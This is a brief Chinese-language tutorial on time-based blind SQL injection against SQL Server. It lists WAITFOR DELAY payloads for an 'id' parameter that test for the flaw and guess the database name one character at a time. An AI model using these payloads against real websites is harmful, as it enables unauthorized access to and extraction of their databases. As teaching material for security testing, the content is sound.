💎一站式轻松地调用各大LLM模型接口,支持GPT4、智谱、豆包、星火、月之暗面及文生图、文生视频 广告
[TOC] ## WAITFOR函数简介 WAITFOR是sqlserver中Transact-sql提供的一个流程控制语句,他的作用就是等待特定的事件,然后继续执行后续的语句,包含一个参数delay,用来指定等待时间 ``` waitfor delay ’0:0:5‘ ``` ## 其他函数介绍 ~~~ db_name 数据库名称 substring 从第一位开始取一位 if m=m 判断是否相等 ~~~ ## 判断是否存在延时注入 ``` id=1;waitfor delay '0:0:5' ``` ## 判断数据库第一个字符 ~~~ id=1 if(substring(db_name(),1,1)='m') waitfor delay '0:0:5' id=1 if(substring(db_name(),1,1)=char(109)) waitfor delay ’0:0:5‘ ~~~ ## ascii码猜测 ~~~ id=1 if ascii(substring(db_name(),1,1))=109 waitfor delay ’0:0:5‘ ~~~